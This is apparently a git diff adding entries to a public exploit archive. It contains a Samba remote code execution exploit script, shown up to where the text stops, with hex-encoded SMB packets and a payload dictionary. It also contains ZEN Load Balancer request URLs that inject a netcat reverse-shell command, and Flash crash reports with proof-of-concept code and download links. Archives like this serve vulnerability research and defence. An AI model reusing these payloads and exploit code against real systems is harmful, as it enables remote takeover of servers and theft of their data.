diff --git a/files.csv b/files.csv
index fb17d114a..f102bde35 100755
--- a/files.csv
+++ b/files.csv
@@ -34037,6 +34037,7 @@ id,file,description,date,author,platform,type,port
 37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
 37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
 37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Local Privilege Escalation",2015-08-18,kpwn,osx,local,0
+37826,platforms/php/webapps/37826.txt,"WordPress Multiple Path Dislosure Vulnerabilities",2012-09-18,AkaStep,php,webapps,0
 37751,platforms/php/webapps/37751.txt,"WordPress WPTF Image Gallery 1.03 - Aribtrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37752,platforms/php/webapps/37752.txt,"WordPress Recent Backups Plugin 0.7 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80
 37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
@@ -34130,6 +34131,7 @@ id,file,description,date,author,platform,type,port
 37805,platforms/php/webapps/37805.txt,"TAGWORX.CMS 'cid' Parameter SQL Injection Vulnerability",2012-09-18,Crim3R,php,webapps,0
 37806,platforms/cgi/webapps/37806.txt,"AxisInternet VoIP Manager Multiple Cross Site Scripting Vulnerabilities",2012-09-18,"Benjamin Kunz Mejri",cgi,webapps,0
 37807,platforms/php/webapps/37807.txt,"VBulletin 4.1.12 'blog_plugin_useradmin.php' SQL Injection Vulnerability",2012-09-18,Am!r,php,webapps,0
+37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0
 37809,platforms/php/webapps/37809.php,"Nuts CMS Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80
 37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - SEH Overwrite",2015-08-18,"_ Un_N0n _",windows,dos,0
 37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 Post Auth RCE",2015-08-18,Ebrietas0,php,webapps,80
@@ -34142,3 +34144,63 @@ id,file,description,date,author,platform,type,port
 37820,platforms/php/webapps/37820.txt,"CodoForum 3.3.1 - Multiple SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
 37821,platforms/php/webapps/37821.txt,"BigTree CMS 4.2.3 - Authenticated SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
 37822,platforms/php/webapps/37822.txt,"WordPress WP Symposium Plugin 15.1 - Blind SQL Injection",2015-08-18,dxw,php,webapps,80
+37827,platforms/php/webapps/37827.txt,"WordPress Purity Theme Multiple Cross Site Scripting Vulnerabilities",2012-09-07,"Matan Azugi",php,webapps,0
+37828,platforms/php/webapps/37828.txt,"Poweradmin 'index.php' Cross Site Scripting Vulnerability",2012-09-20,Siavash,php,webapps,0
+37829,platforms/php/webapps/37829.txt,"WordPress MF Gig Calendar Plugin Cross Site Scripting Vulnerability",2012-09-20,"Chris Cooper",php,webapps,0
+37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer Multiple Security Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0
+37833,platforms/php/webapps/37833.txt,"YCommerce Multiple SQL Injection Vulnerabilities",2012-09-21,"Ricardo Almeida",php,webapps,0
+37834,platforms/linux/remote/37834.py,"Samba 3.5.11/3.6.3 Unspecified Remote Code Execution Vulnerability",2012-09-24,kb,linux,remote,0
+37835,platforms/php/webapps/37835.html,"WordPress Cross Site Request Forgery Vulnerability",2012-09-22,AkaStep,php,webapps,0
+37836,platforms/php/webapps/37836.txt,"WordPress Token Manager Plugin 'tid' Parameter Cross Site Scripting Vulnerability",2012-09-25,TheCyberNuxbie,php,webapps,0
+37837,platforms/php/webapps/37837.html,"WordPress Sexy Add Template Plugin Cross Site Request Forgery Vulnerability",2012-09-22,the_cyber_nuxbie,php,webapps,0
+37838,platforms/php/webapps/37838.txt,"Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross Site Scripting Vulnerability",2011-12-30,farbodmahini,php,webapps,0
+37839,platforms/linux/dos/37839.txt,"Flash PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution",2015-08-19,"Google Security Research",linux,dos,0
+37840,platforms/windows/remote/37840.txt,"Flash Broker-Based Sandbox Escape via Forward Slash Instead of Backslash",2015-08-19,KeenTeam,windows,remote,0
+37841,platforms/windows/remote/37841.txt,"Flash Broker-Based Sandbox Escape via Unexpected Directory Lock",2015-08-19,KeenTeam,windows,remote,0
+37842,platforms/windows/remote/37842.txt,"Flash Broker-Based Sandbox Escape via Timing Attack Against File Moving",2015-08-19,KeenTeam,windows,remote,0
+37843,platforms/windows/dos/37843.txt,"Flash Player Integer Overflow in Function.apply",2015-08-19,"Google Security Research",windows,dos,0
+37844,platforms/windows/dos/37844.txt,"Flash AVSS.setSubscribedTags Use After Free Memory Corruption",2015-08-19,"Google Security Research",windows,dos,0
+37845,platforms/windows/dos/37845.txt,"Flash Uninitialized Stack Variable MPD Parsing Memory Corruption",2015-08-19,bilou,windows,dos,0
+37846,platforms/windows/dos/37846.txt,"Flash Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory",2015-08-19,bilou,windows,dos,0
+37847,platforms/windows/dos/37847.txt,"Flash AS2 Use After Free in TextField.filters",2015-08-19,bilou,windows,dos,0
+37848,platforms/windows/dos/37848.txt,"Flash AS2 Use After Free While Setting TextField.filters",2015-08-19,bilou,windows,dos,0
+37849,platforms/windows/dos/37849.txt,"Flash Use-After-Free in Display List Handling",2015-08-19,KeenTeam,windows,dos,0
+37850,platforms/multiple/dos/37850.txt,"Flash Use-After-Free in NetConnection.connect",2015-08-19,"Google Security Research",multiple,dos,0
+37851,platforms/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",multiple,remote,0
+37852,platforms/multiple/dos/37852.txt,"Adobe Flash Use-After-Free When Setting Variable",2015-08-19,"Google Security Research",multiple,dos,0
+37853,platforms/windows/dos/37853.txt,"Flash AS2 Use After Free in DisplacementMapFilter.mapBitmap",2015-08-19,"Google Security Research",windows,dos,0
+37854,platforms/windows/dos/37854.txt,"Flash Use-After-Free with MovieClip.scrollRect in AS2",2015-08-19,"Google Security Research",windows,dos,0
+37855,platforms/multiple/dos/37855.txt,"Adobe Flash Use-After-Free When Setting Value",2015-08-19,"Google Security Research",multiple,dos,0
+37856,platforms/windows/dos/37856.txt,"Adobe Flash Out-of-Bounds Memory Read While Parsing a Mutated SWF File",2015-08-19,"Google Security Research",windows,dos,0
+37857,platforms/windows/dos/37857.txt,"Adobe Flash Out-of-Bounds Memory Read While Parsing a Mutated SWF File (2)",2015-08-19,"Google Security Research",windows,dos,0
+37858,platforms/windows/dos/37858.txt,"Adobe Flash Out-of-Bounds Memory Read While Parsing a Mutated TTF File Embedded in SWF",2015-08-19,"Google Security Research",windows,dos,0
+37859,platforms/multiple/dos/37859.txt,"Adobe Flash Use-After-Free in XML.childNodes",2015-08-19,"Google Security Research",multiple,dos,0
+37860,platforms/windows/dos/37860.txt,"Flash Use-After-Free with Color.setRGB in AS2",2015-08-19,bilou,windows,dos,0
+37861,platforms/windows/dos/37861.txt,"Flash AS2 Use-After-Free in DisplacementMapFilter.mapBitmap (2)",2015-08-19,bilou,windows,dos,0
+37862,platforms/windows/dos/37862.txt,"Adobe Flash Out-of-Bounds Read in UTF Conversion",2015-08-19,"Google Security Research",windows,dos,0
+37863,platforms/multiple/dos/37863.txt,"Adobe Flash Use-After-Free in scale9Grid",2015-08-19,"Google Security Research",multiple,dos,0
+37864,platforms/multiple/dos/37864.txt,"Adobe Flash Use-After-Free in Drawing Methods _this_",2015-08-19,"Google Security Research",multiple,dos,0
+37865,platforms/multiple/dos/37865.txt,"Adobe Flash Use-After-Free in attachMovie",2015-08-19,"Google Security Research",multiple,dos,0
+37866,platforms/linux/dos/37866.txt,"Adobe Flash Pointer Crash in Drawing and Bitmap Handling",2015-08-19,"Google Security Research",linux,dos,0
+37867,platforms/linux/dos/37867.txt,"Adobe Flash Pointer Crash After Continuing Slow Script",2015-08-19,"Google Security Research",linux,dos,0
+37868,platforms/linux/dos/37868.txt,"Adobe Flash Bad Dereference at 0x23c on Linux x64",2015-08-19,"Google Security Research",linux,dos,0
+37869,platforms/linux/dos/37869.txt,"Adobe Flash Pointer Crash in Button Handling",2015-08-19,"Google Security Research",linux,dos,0
+37870,platforms/linux/dos/37870.txt,"Adobe Flash Pointer Crash in XML Handling",2015-08-19,"Google Security Research",linux,dos,0
+37871,platforms/multiple/dos/37871.txt,"Adobe Flash Use-After-Free in swapDepths",2015-08-19,"Google Security Research",multiple,dos,0
+37872,platforms/multiple/dos/37872.txt,"Adobe Flash Bad Write in XML When Callback Modifies XML Tree During Property Delete",2015-08-19,"Google Security Research",multiple,dos,0
+37873,platforms/multiple/dos/37873.txt,"Adobe Flash Use-After-Free in createTextField",2015-08-19,"Google Security Research",multiple,dos,0
+37874,platforms/multiple/dos/37874.txt,"Adobe Flash Type Confusion in TextRenderer.setAdvancedAntialiasingTable",2015-08-19,"Google Security Research",multiple,dos,0
+37875,platforms/windows/dos/37875.txt,"Adobe Flash URL Resource Use-After-Free",2015-08-19,"Google Security Research",windows,dos,0
+37876,platforms/lin_amd64/dos/37876.txt,"Adobe Flash XMLSocket Destructor Not Cleared Before Setting User Data in connect",2015-08-19,"Google Security Research",lin_amd64,dos,0
+37877,platforms/multiple/dos/37877.txt,"Adobe Flash Use-After-Free in TextField.gridFitType",2015-08-19,"Google Security Research",multiple,dos,0
+37878,platforms/multiple/dos/37878.txt,"Adobe Flash: FileReference Class Type Confusion",2015-08-19,"Google Security Research",multiple,dos,0
+37879,platforms/lin_amd64/dos/37879.txt,"Adobe Flash Heap-Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec",2015-08-19,"Google Security Research",lin_amd64,dos,0
+37880,platforms/lin_amd64/dos/37880.txt,"Adobe Flash Heap-Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",lin_amd64,dos,0
+37881,platforms/win32/dos/37881.txt,"Adobe Flash Shared Object Type Confusion",2015-08-19,"Google Security Research",win32,dos,0
+37882,platforms/multiple/dos/37882.txt,"Adobe Flash Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",multiple,dos,0
+37883,platforms/windows/dos/37883.txt,"Adobe Flash AS2 Use-After-Free in TextField.filters",2015-08-19,bilou,windows,dos,0
+37884,platforms/windows/dos/37884.txt,"Adobe Flash Heap Use-After-Free in SurfaceFilterList::C​reateFromScriptAtom",2015-08-19,bilou,windows,dos,0
+37885,platforms/php/webapps/37885.html,"up.time 7.5.0 Superadmin Privilege Escalation Exploit",2015-08-19,LiquidWorm,php,webapps,9999
+37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999
+37887,platforms/php/webapps/37887.txt,"up.time 7.5.0 Arbitrary File Disclose And Delete Exploit",2015-08-19,LiquidWorm,php,webapps,9999
+37888,platforms/php/webapps/37888.txt,"up.time 7.5.0 Upload And Execute File Exploit",2015-08-19,LiquidWorm,php,webapps,9999
diff --git a/platforms/cgi/webapps/37830.txt b/platforms/cgi/webapps/37830.txt
new file mode 100755
index 000000000..80ad0caf4
--- /dev/null
+++ b/platforms/cgi/webapps/37830.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/55638/info
+
+ZEN Load Balancer is prone to the following security vulnerabilities:
+
+1. Multiple arbitrary command-execution vulnerabilities
+2. Multiple information-disclosure vulnerabilities
+3. An arbitrary file-upload vulnerability
+
+An attacker can exploit these issues to execute arbitrary commands, upload arbitrary files to the affected computer, or disclose sensitive-information.
+
+ZEN Load Balancer 2.0 and 3.0 rc1 are vulnerable. 
+
+http://www.example.com/index.cgi?id=2-2&filelog=%26nc+192.168.1.1+4444+-e+/bin/bash;&nlines=1&action=See+logs
+http://www.example.com/index.cgi?id=2-2&filelog=#&nlines=1%26nc+192.168.1.1+4444+-e+/bin/bash;&action=See+logs
+http://www.example.com/index.cgi?id=3-2&if=lo%26nc+192.168.1.1+4444+-e+/bin/bash%26&status=up&newip=0.0.0.0&netmask=255.255.255.0&gwaddr=&action=Save+%26+Up!
+http://www.example.com/config/global.conf
+http://www.example.com/backup/ 
\ No newline at end of file
diff --git a/platforms/lin_amd64/dos/37876.txt b/platforms/lin_amd64/dos/37876.txt
new file mode 100755
index 000000000..9f5604773
--- /dev/null
+++ b/platforms/lin_amd64/dos/37876.txt
@@ -0,0 +1,40 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=416&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+This issue is a variant of  issue 192 , which the fix did not address.
+
+If XMLSocket connect is called on an object that already has a destroy function set, such as a BitmapData object, the method will set the user data of that object, but not clear the destroy function. This leads to type confusion when the user data is freed during garbage collection.
+
+A PoC is as follows:
+
+class subsocket extends flash.display.BitmapData{
+	
+
+	public function subsocket(){
+			
+	var n = {valueOf : func};
+    this.valueOf = func;
+	var x = new XMLSocket();
+
+	x.connect.call(this, "127.0.0.1", this);
+
+}
+
+function func(){
+
+	if(this){
+		}
+	this.__proto__ = {}; 
+	this.__proto__.__constructor__ = flash.display.BitmapData;
+	super(10, 10, true, 10);
+	return 80;
+	}
+		
+		
+}
+	
+
+A SWF and fla are attached. Note that this PoC needs to be run on a webserver on localhost (or change the IP in the PoC to the server value), and it only crashes in Chrome on 64-bit Linux.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37876.zip
+
diff --git a/platforms/lin_amd64/dos/37879.txt b/platforms/lin_amd64/dos/37879.txt
new file mode 100755
index 000000000..6f4fcfad7
--- /dev/null
+++ b/platforms/lin_amd64/dos/37879.txt
@@ -0,0 +1,24 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=425&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+To reproduce, host the attached files appropriately and:
+
+http://localhost/LoadMP4.swf?file=crash4000368.flv
+
+If there is no crash at first, refresh the page a few times.
+
+With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:
+
+=> 0x00007f7789d081bb <__memmove_ssse3_back+443>:	movaps %xmm1,-0x10(%rdi)
+
+rdi            0x7f7778d69200
+
+7f777894b000-7f7778d69000 rw-p 00000000 00:00 0 
+7f7778d69000-7f7778d88000 ---p 00000000 00:00 0 
+
+This looks very like a heap-based buffer overflow that just happens to have walked off the end of the committed heap.
+
+Also, this bug bears disturbing similarities to CVE-2015-3043, see for example: https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37879.zip
+
diff --git a/platforms/lin_amd64/dos/37880.txt b/platforms/lin_amd64/dos/37880.txt
new file mode 100755
index 000000000..83aa08faa
--- /dev/null
+++ b/platforms/lin_amd64/dos/37880.txt
@@ -0,0 +1,24 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=426&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+To reproduce, host the attached files appropriately, and:
+
+http://localhost/LoadMP4.swf?file=crash3006694.flv
+
+If there is no crash at first, refresh the page a few times.
+
+With a debugger attached to 64-bit Flash in Chrome Linux, the crash manifests like this:
+
+=> 0x00007f7779846eee:	mov    %ax,(%rdi,%rdx,2)
+
+rax            0xff69
+rdi            0x7f7778b70000
+rdx            0x160b
+
+7f777861e000-7f7778b72000 rw-p 00000000 00:00 0 
+7f7778b72000-7f7779228000 ---p 00000000 00:00 0 
+
+It looks like an indexing error; the rdi "base" address is in bounds but add on 2*rdx and the address is not in bounds.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37880.zip
+
diff --git a/platforms/linux/dos/37839.txt b/platforms/linux/dos/37839.txt
new file mode 100755
index 000000000..7928fb907
--- /dev/null
+++ b/platforms/linux/dos/37839.txt
@@ -0,0 +1,63 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=224&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+There’s an error in the PCRE engine version used in Flash that allows the execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE.
+
+This issue is a duplicate of http://bugs.exim.org/show_bug.cgi?id=1546 originally reported to PCRE upstream by mikispag; I rediscovered the issue fuzzing Flash so have filed this bug report to track disclosure deadline for Adobe.
+
+The issue occurs in the handling of zero-length assertions; ie assertions where the object of the assertion is prepended with the OP_BRAZERO operator.
+
+Simplest testcase that will crash in an ASAN build is the following:
+
+(?(?<a>)?)
+
+This is pretty much a nonsense expression, and I'm not sure why it compiles successfully; but it corresponds to the statement that 'assert that named group 'a' optionally matches'; which is tautologically true regardless of 'a'.
+
+Regardless, we emit the following bytecode:
+
+0000 5d0012      93 BRA              [18]
+0003 5f000c      95 COND             [12]
+0006 66         102 BRAZERO          
+0007 5e00050001  94 CBRA             [5, 1]
+000c 540005      84 KET              [5]
+000f 54000c      84 KET              [12]
+0012 540012      84 KET              [18]
+0015 00           0 END        
+
+When this is executed, we reach the following code:
+
+/* The condition is an assertion. Call match() to evaluate it - setting
+the final argument match_condassert causes it to stop at the end of an
+assertion. */
+
+else
+  {
+  RMATCH(eptr, ecode + 1 + LINK_SIZE, offset_top, md, ims, NULL,
+      match_condassert, RM3);
+  if (rrc == MATCH_MATCH)
+    {
+    condition = TRUE;
+    ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);
+    while (*ecode == OP_ALT) ecode += GET(ecode, 1);      <---- ecode is out of bounds at this point.
+
+If we look at the execution trace for this expression, we can see where this code goes wrong:
+
+exec 0x600e0000dfe4 93 [0x60040000dfd0 41]
+exec 0x600e0000dfe7 95 [0x60040000dfd0 41]
+exec 0x600e0000dfea 102 [0x60040000dfd0 41] <--- RMATCH recursive match
+exec 0x600e0000dfeb 94 [0x60040000dfd0 41]
+exec 0x600e0000dff0 84 [0x60040000dfd0 41]
+exec 0x600e0000dff3 84 [0x60040000dfd0 41]
+exec 0x600e0000dff6 84 [0x60040000dfd0 41]
+exec 0x600e0000dff9 0 [0x60040000dfd0 41]   <--- recursive match returns
+before 0x600e0000dfe7 24067                 <--- ecode == 0x...dfe7
+after 0x600e00013dea
+
+If we look at the start base for our regex, it was based at dfe4; so dfe7 is the OP_COND, as expected. Looking at the next block of code, we're clearly expecting the assertion to be followed by a group; likely OP_CBRA or another opcode that has a 16-bit length field following the opcode byte.
+
+ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);
+
+In this case, the insertion of the OP_BRAZERO has resulted in the expected OP_CBRA being shifted forward by a byte to 0x...dfeb; and this GET results in the value of 0x5e00 + 1 + LINK_SIZE being added to the ecode pointer, instead of the correct 0x0005 + 1 + LINK_SIZE, resulting in bytecode execution hopping outside of the allocated heap buffer.
+
+See attached for a crash PoC for the latest Chrome/Flash on x64 linux.
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37839.zip
diff --git a/platforms/linux/dos/37866.txt b/platforms/linux/dos/37866.txt
new file mode 100755
index 000000000..e6f02f573
--- /dev/null
+++ b/platforms/linux/dos/37866.txt
@@ -0,0 +1,37 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=396&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+A nasty looking crash is manifesting in various different ways under fuzzing, apparently related to drawing and bitmap handling.
+
+A trigger is attached, signal_sigsegv_7ffff5b5aee2_252_0688bbd450e7c095265d00be2fca50ab.swf
+
+The base file from which this fuzz case was generated is attached, 0688bbd450e7c095265d00be2fca50ab.swf
+
+The crash on 64-bit Linux looks like this:
+
+=> 0x00007f69314b8f7d:	cmpl   $0xc,0x174(%rax)
+
+rax            0x83071500ff0300	36881008741516032
+
+If we trace through the usages of %rax, we can get to some bad writes pretty easily:
+
+=> 0x00007f69314b8f7d:	cmpl   $0xc,0x174(%rax)
+   0x00007f69314b8f84:	je     0x7f69314b8fa0
+...
+   0x00007f69314b8fa0:	mov    (%rax),%rdi      <-- rdi compromised
+   0x00007f69314b8fa3:	callq  0x7f69314b8810
+...
+   0x00007f69314b8810:	mov    (%rsi),%edx
+   0x00007f69314b8812:	cmp    $0x7ffffff,%edx
+   0x00007f69314b8818:	je     0x7f69314b8862
+   0x00007f69314b881a:	mov    0x10(%rdi),%eax
+   0x00007f69314b881d:	cmp    $0x7ffffff,%eax
+   0x00007f69314b8822:	je     0x7f69314b8868
+   0x00007f69314b8824:	sub    $0x1,%edx
+   0x00007f69314b8827:	cmp    %eax,%edx
+   0x00007f69314b8829:	cmovg  %eax,%edx
+   0x00007f69314b882c:	mov    0x14(%rdi),%eax
+   0x00007f69314b882f:	mov    %edx,0x10(%rdi)  <---- rdi written to
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37866.zip
+
diff --git a/platforms/linux/dos/37867.txt b/platforms/linux/dos/37867.txt
new file mode 100755
index 000000000..955e9d140
--- /dev/null
+++ b/platforms/linux/dos/37867.txt
@@ -0,0 +1,22 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=397&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+Running the attached swf file in Google Chrome (Linux x64) will eventually result in dialog offering to terminate the slow script. (Not the Google Chrome infobar that says that Flash isn't responding, but the dialog that appears after that.)
+
+Upon electing to terminate the script, a crash occurs.
+
+It is not known whether this bug can be triggered or not without user interaction.
+
+The crashing swf is signal_sigsegv_7ffff5ce5ea4_6963_b1d6342468487426c7ea26c725453e7d.swf
+
+The base file from which the mutated file was generated is b1d6342468487426c7ea26c725453e7d.swf
+
+On Linux x64, the crash looks like this:
+
+=> 0x00007f6931525318:	andl   $0xffffffbf,0x3c(%rax)
+rax            0x7ff8000000000000	9221120237041090560
+
+And if we look back in the assembly a bit, the wild value has come from %rbx that points to a block of wild values.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37867.zip
+
diff --git a/platforms/linux/dos/37868.txt b/platforms/linux/dos/37868.txt
new file mode 100755
index 000000000..458e6f2c5
--- /dev/null
+++ b/platforms/linux/dos/37868.txt
@@ -0,0 +1,13 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=398&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+The attached sample, signal_sigsegv_7ffff603deef_1525_268381c02bc3b05c84578ebaeafc02f0.swf, typically crashes in this way on my Linux x64 build (Flash v17.0.0.188):
+
+=> 0x00007f693155bf58:	mov    (%rdi),%rbx
+rdi            0x23c	572
+
+At first glance this might appear to be a NULL dereference but sometimes it crashes trying to access 0xc8 and different builds have shown crashes at much wilder addresses, so there is probably a use-after-free or other non-deterministic condition going on. For example, our fuzzing cluster saw a crash at 0x400000001.
+
+The base sample from which the fuzz case is derived is also attached.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37868.zip
diff --git a/platforms/linux/dos/37869.txt b/platforms/linux/dos/37869.txt
new file mode 100755
index 000000000..6fb12f4e7
--- /dev/null
+++ b/platforms/linux/dos/37869.txt
@@ -0,0 +1,11 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=399&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+The attached sample, signal_sigsegv_7ffff60a1429_9554_f4dc661554237404dfe394d4c6c3e674.swf, crashes in this manner on Linux x64:
+
+=> 0x00007f693158481f:	movzbl (%rcx),%r11d
+rcx            0x3102ffffecfd	53888954658045
+
+The base sample from which this fuzz case was generated is also attached. We believe this may be related to button handling.
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37869.zip
diff --git a/platforms/linux/dos/37870.txt b/platforms/linux/dos/37870.txt
new file mode 100755
index 000000000..0f4990e61
--- /dev/null
+++ b/platforms/linux/dos/37870.txt
@@ -0,0 +1,24 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=400&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id
+
+The attached sample file, signal_sigsegv_7ffff637297a_8900_e3f87b25c25db8f9ec3c975f8c1211cc.swf, crashes, perhaps relating to XML handling.
+
+The crash looks like this on Linux x64:
+
+=> 0x00007f6931226f22:	mov    0x8(%rcx),%eax
+rcx            0x303030303030300	217020518514230016
+
+The wider context shows that the wild pointer target can be incremented with this vulnerability, which is typically enough for an exploit:
+
+=> 0x00007f6931226f22:	mov    0x8(%rcx),%eax    <--- read
+   0x00007f6931226f25:	test   %eax,%eax
+   0x00007f6931226f27:	je     0x7f6931226f80
+   0x00007f6931226f29:	test   $0x40000000,%eax
+   0x00007f6931226f2e:	jne    0x7f6931226f80
+   0x00007f6931226f30:	add    $0x1,%eax         <--- increment
+   0x00007f6931226f33:	cmp    $0xff,%al
+   0x00007f6931226f35:	mov    %eax,0x8(%rcx)    <--- write back
+
+The base sample from which this fuzz case was generated is also attached, e3f87b25c25db8f9ec3c975f8c1211cc.swf
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37870.zip
diff --git a/platforms/linux/remote/23811.c b/platforms/linux/remote/23811.c
index e265ee8a9..055a296c4 100755
--- a/platforms/linux/remote/23811.c
+++ b/platforms/linux/remote/23811.c
@@ -1,5 +1,6 @@
 source: http://www.securityfocus.com/bid/9871/info
 
+
 It has been reported that Mathopd is prone to a remote buffer overflow vulnerability. The issue arises due to a failure to check the bounds of a buffer storing user-supplied input.
 
 It may be possible for attackers to leverage this vulnerability to execute arbitrary instructions on the affected system. Any code executed would be in the security context of the web server process.
@@ -523,4 +524,4 @@ int main(int argc, char **argv, char **env) {
   FREE(target);
   log("done.\n");
   return 0;
-}
\ No newline at end of file
+}
diff --git a/platforms/linux/remote/37834.py b/platforms/linux/remote/37834.py
new file mode 100755
index 000000000..ac1af9578
--- /dev/null
+++ b/platforms/linux/remote/37834.py
@@ -0,0 +1,264 @@
+source: http://www.securityfocus.com/bid/55655/info
+
+Samba is prone to an unspecified remote code-execution vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code with root privileges. Failed exploit attempts will cause a denial-of-service condition. 
+
+#!/usr/bin/python
+#
+# finding targets 4 31337z:
+# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e "print system"` | grep '$1'
+#    -> to get system_libc_addr, enter this value in the 'system_libc_offset' value of the target_finder, run, sit back, wait for shell
+# found by eax samba 0day godz (loljk)
+
+
+from binascii import hexlify, unhexlify
+import socket
+import threading
+import SocketServer
+import sys
+import os
+import time
+import struct      
+
+targets = [
+	{
+		"name"               : "samba_3.6.3-debian6",
+		"chunk_offset"       : 0x9148,
+		"system_libc_offset" : 0xb6d003c0
+	},
+	{
+		"name"               : "samba_3.5.11~dfsg-1ubuntu2.1_i386 (oneiric)",
+		"chunk_offset"       : 4560, 
+		"system_libc_offset" : 0xb20
+	},
+	{
+		"name"               : "target_finder (hardcode correct system addr)", 
+		"chunk_offset"       : 0, 
+		"system_libc_offset" : 0xb6d1a3c0, 
+		"finder": True
+	}
+]
+
+do_brute = True
+rs = 1024
+FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
+
+def dump(src, length=32):
+	result=[]
+	for i in xrange(0, len(src), length):
+		s = src[i:i+length]
+		hexa = ' '.join(["%02x"%ord(x) for x in s])
+		printable = s.translate(FILTER)
+		result.append("%04x   %-*s   %s\n" % (i, length*3, hexa, printable))
+	return ''.join(result)
+
+
+sploitshake = [
+	# HELLO
+	"8100004420434b4644454e4543464445" + \
+	"46464346474546464343414341434143" + \
+	"41434143410020454745424644464545" + \
+	"43455046494341434143414341434143" + \
+	"4143414341414100",
+
+	# NTLM_NEGOT
+	"0000002fff534d427200000000000000" + \
+	"00000000000000000000000000001d14" + \
+	"00000000000c00024e54204c4d20302e" + \
+	"313200",
+
+	# SESSION_SETUP
+	"0000004bff534d427300000000080000" + \
+	"000000000000000000000000ffff1d14" + \
+	"000000000dff000000ffff02001d1499" + \
+	"1f00000000000000000000010000000e" + \
+	"000000706f736978007079736d6200",
+
+	# TREE_CONNECT
+	"00000044ff534d427500000000080000" + \
+	"000000000000000000000000ffff1d14" + \
+	"6400000004ff00000000000100190000" + \
+	"5c5c2a534d425345525645525c495043" + \
+	"24003f3f3f3f3f00",
+
+	# NT_CREATE
+	"00000059ff534d42a200000000180100" + \
+	"00000000000000000000000001001d14" + \
+	"6400000018ff00000000050016000000" + \
+	"000000009f0102000000000000000000" + \
+	"00000000030000000100000040000000" + \
+	"020000000306005c73616d7200"
+]
+
+pwnsauce = {
+	'smb_bind': \
+		"00000092ff534d422500000000000100" + \
+		"00000000000000000000000001001d14" + \
+		"6400000010000048000004e0ff000000" + \
+		"0000000000000000004a0048004a0002" + \
+		"002600babe4f005c504950455c000500" + \
+		"0b03100000004800000001000000b810" + \
+		"b8100000000001000000000001007857" + \
+		"34123412cdabef000123456789ab0000" + \
+		"0000045d888aeb1cc9119fe808002b10" + \
+		"486002000000",
+
+	'data_chunk': \
+		"000010efff534d422f00000000180000" + \
